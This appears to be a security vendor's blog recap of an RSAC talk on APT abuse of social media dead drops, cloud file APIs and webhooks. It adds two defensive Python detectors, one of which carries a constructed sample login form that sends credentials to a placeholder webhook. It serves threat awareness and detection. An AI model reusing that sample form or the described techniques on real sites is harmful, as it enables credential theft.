
Analyzing social media exploitation at RSAC with CSO Deepen Desai

Jun 03, 2024

Has a recruiter recently reached out to you with an offer that looked too good to be true? At the 2024 RSA Conference, Zscaler Chief Security Officer (CSO) Deepen Desai explained why you should be wary. His informative presentation focused on analyzing new tactics used by advanced persistent threat (APT) groups. He was joined by Senior Manager of APT Research, Sudeep Singh, for their talk titled “Look at Recent APT Attacks: Using Social Media and Cloud Hosts as Launchpad”. As the name suggests, it offered an eye-opening look at how popular social media and cloud platforms are used in advanced cyberattacks.

Hiding in plain sight

Threat actors generally favor the path of least resistance, which is why phishing remains far more popular than trying to exploit technical vulnerabilities. Tricking someone into giving up access is easier than breaking through complex access controls. Likewise, subverting the freely available features of social media sites is easier than compromising those sites for malicious use.

As Desai explains, “Typically what we see is threat actors place important information on social media profiles they own, or they might even add this information in comments or posts. These could be YouTube comments or Facebook posts. Typically this information is stored encoded and encrypted as opposed to plain text. There are two key advantages here for the threat actor. One is that they are able to make their infrastructure more resilient to take downs. The second is that threat actors can dynamically choose to update the information about their infrastructure at any given point of time.”

To illustrate this concept, Desai presented a three-column slide depicting the relationship between the victim environment, cloud services/social media, and the attacker’s infrastructure.

Figure 1: Attacker uses social media/cloud services to facilitate operations in the victim environment

For example, attackers may host information about the location of their command and control (C2) servers on a social media page they control. Malware active in the victim environment relies on communicating with C2 servers for updates, instructions, and other operations. If attackers have to suddenly move their C2 servers, the malware could lose contact with the attacker infrastructure. Such a loss of communication could derail the adversaries’ ability to exploit the victim’s environment. This problem is solved when adversaries publish the locations of their C2 servers on social media. If the C2 servers move, the adversaries simply post the new location on the social media page and the malware reestablishes contact.

Cloud API Abuse

Public cloud services with versatile application programming interfaces (APIs) offer threat actors several appealing capabilities. Services such as Dropbox, Telegram, and Microsoft Graph provide file management functionality to users, allowing them to create, move, and delete files. Most cloud hosting services control access by giving users an API key that is used to connect to their online account. Attackers can create cloud service accounts and embed the corresponding API keys in malware. After infecting a system, the malware can use the embedded API key to connect to and use the cloud service from the victim’s environment.

For example, consider malware in a user’s environment with an embedded API key for creating a Dropbox account.

Figure 2: Attacker using cloud services to perform file operations in the victim environment

When malware connects to a Dropbox account (or another API-enabled cloud service) from the victim’s environment, it establishes a fast path for data exfiltration. As in the social media example, the adversaries still use Dropbox to facilitate C2 operations - but they can do much more. Dropbox gives its users access to file operations such as folder creation and copying. These features make stealing data from the victim environment trivial. Adversaries copy the files they want from the victim’s system to the Dropbox account, then collect them at leisure.
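One way a defender can look for both patterns described above (the social media dead drop from the previous section and bulk uploads to cloud file APIs) in proxy logs. This is an added example, not code from the talk or from Zscaler; the log format, the host watchlists and the thresholds are assumptions, and the log lines are constructed.

```python
from collections import defaultdict
from datetime import datetime, timedelta
# Constructed sample proxy log: "<ISO time> <client IP> <method> <host> <bytes sent>"
SAMPLE_LOG = """\
2024-06-03T10:00:01 10.0.0.5 GET www.youtube.com 512
2024-06-03T10:00:09 10.0.0.5 POST 203.0.113.77 640
2024-06-03T10:01:00 10.0.0.5 POST content.dropboxapi.com 52428800
2024-06-03T10:02:00 10.0.0.5 POST content.dropboxapi.com 41943040
2024-06-03T10:05:00 10.0.0.9 GET www.youtube.com 480
2024-06-03T11:00:00 10.0.0.9 POST content.dropboxapi.com 2048
"""

# Assumed watchlists (tune them): dead-drop hosts and the cloud file APIs named in the talk.
DEAD_DROP_HOSTS = {"www.youtube.com", "www.facebook.com", "pastebin.com"}
CLOUD_API_HOSTS = {"content.dropboxapi.com", "api.telegram.org", "graph.microsoft.com"}
WINDOW = timedelta(minutes=2)    # max gap between dead-drop fetch and first C2 contact
EXFIL_BYTES = 50 * 1024 * 1024   # upload volume per client that warrants a look

def parse(log):
    events = []
    for line in log.splitlines():
        ts, client, method, host, sent = line.split()
        events.append((datetime.fromisoformat(ts), client, method, host, int(sent)))
    return sorted(events)

def is_raw_ip(host):
    parts = host.split(".")
    return len(parts) == 4 and all(p.isdigit() for p in parts)

def dead_drop_candidates(events):
    """Clients that fetch a social/paste page and, within WINDOW, contact a raw IP
    they have never talked to before: the shape of malware resolving its C2."""
    last_fetch, seen_ips, hits = {}, defaultdict(set), set()
    for ts, client, _method, host, _sent in events:
        if host in DEAD_DROP_HOSTS:
            last_fetch[client] = ts
        elif is_raw_ip(host):
            recent = client in last_fetch and ts - last_fetch[client] <= WINDOW
            if recent and host not in seen_ips[client]:
                hits.add(client)
            seen_ips[client].add(host)
    return hits

def exfil_candidates(events):
    """Clients whose POST volume to cloud file APIs reaches EXFIL_BYTES."""
    uploaded = defaultdict(int)
    for _ts, client, method, host, sent in events:
        if method == "POST" and host in CLOUD_API_HOSTS:
            uploaded[client] += sent
    return {c for c, total in uploaded.items() if total >= EXFIL_BYTES}
```

Both checks are heuristics: legitimate Dropbox users and developers who visit raw IPs will show up, so treat hits as leads to triage against the client's process telemetry, not as verdicts.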

Webhooks

Webhooks are event-driven communications sent by web applications to a specific destination for processing. For example, a webhook can be configured to send data from an online form directly into an organization’s content management system (CMS). They can be used to send alerts when a web page visitor requests a chat session. The capability to use a triggered online event to send data also makes them a prime target for misuse by APT groups.  

Threat actors can easily set up phishing pages that use webhooks to steal user credentials and other information. For example, if attackers redirect users to a fake (but believable) Microsoft login page, they can use a webhook to deliver any credentials the user enters. The attackers can also receive other information from the site visitor, such as their IP address and browser type. 

Figure 3: Webhooks are being used for phishing attacks and targeting specific locations
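A defender-side check for the phishing pattern just described, added here as an example rather than anything from the talk: scan a captured page for a login form whose submitted data is routed to a webhook endpoint. The webhook host patterns, the password field names and the sample page are assumptions (placeholder paths, not real hooks).

```python
import re
from html.parser import HTMLParser

# Assumed patterns for webhook-style sinks; extend with the providers relevant to you.
WEBHOOK_PATTERNS = [
    r"discord(?:app)?\.com/api/webhooks/",
    r"hooks\.slack\.com/services/",
    r"api\.telegram\.org/bot",
]
URL_RE = re.compile(r"https?://[^\s'\"<>]+")
PASSWORD_FIELDS = {"password", "passwd", "pwd"}

class FormCollector(HTMLParser):
    """Collects form actions, input names and every URL found in inline scripts."""
    def __init__(self):
        super().__init__()
        self.actions, self.fields, self.script_urls = [], [], []
        self._in_script = False
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form" and a.get("action"):
            self.actions.append(a["action"])
        elif tag == "input" and a.get("name"):
            self.fields.append(a["name"].lower())
        elif tag == "script":
            self._in_script = True
    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
    def handle_data(self, data):
        if self._in_script:
            self.script_urls.extend(URL_RE.findall(data))

def analyze(html):
    """Flag a page that collects a password and names a webhook sink anywhere in it."""
    p = FormCollector()
    p.feed(html)
    sinks = [u for u in p.actions + p.script_urls
             if any(re.search(pat, u) for pat in WEBHOOK_PATTERNS)]
    collects_password = any(f in PASSWORD_FIELDS for f in p.fields)
    return {"webhook_sinks": sinks, "collects_password": collects_password,
            "suspicious": bool(sinks) and collects_password}

# Constructed sample: a lookalike login form whose action and script both name webhook sinks.
SAMPLE_PAGE = """<html><body>
<form action="https://hooks.slack.com/services/T000/B000/EXAMPLE" method="post">
  <input name="loginfmt"><input name="passwd" type="password">
</form>
<script>var backup = "https://api.telegram.org/botPLACEHOLDER/sendMessage";</script>
</body></html>"""
```

Real kits often build the sink URL at runtime or post through an intermediate relay, so pair this static check with proxy logs of where the page's visitors actually send data.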

Webhooks also help APT groups target specific geographical regions with their attacks. Adversaries can configure webhooks to report the general location of people visiting a web site, and use that data to determine whether to attack. 

Desai explains, ”As an example, let's say threat actors are targeting a specific country like Poland. They choose to deliver the malware only if the request is originating from a machine in Poland. The victim visits a website, basically the website controlled by the attacker, which initiates a webhook call. This webhook call sends a notification to the threat actor. The threat actor performs an inspection on the request to check where it is coming from. In this case, they check whether the request is coming from Poland before they choose to deliver the malware. If the request is not coming from Poland, then they will send a clean decoy file so as to not raise an alert.”

Staying ahead of APTs

While the full RSAC presentation covered more ground (payload hosting, current APT campaigns, LinkedIn abuse, etc.), the underlying message was clear - stay informed. Threat actors continuously abuse legitimate resources and find creative ways to weaponize popular technology. Social media and cloud services are simply the latest examples of adversaries’ well-established trend of subverting trusted technology to facilitate attacks. Being aware of the latest tactics, techniques, and procedures (TTPs) used by APTs is a key step in protecting your organization.

If you want more information on the latest TTPs and threat campaigns observed in the Zscaler Zero Trust Exchange, consider downloading the CXO REvolutionaries Cyber Update. For an in-depth look at cyberattacks occurring on a global scale, Zscaler provides regular reports from its threat research team, ThreatLabz.
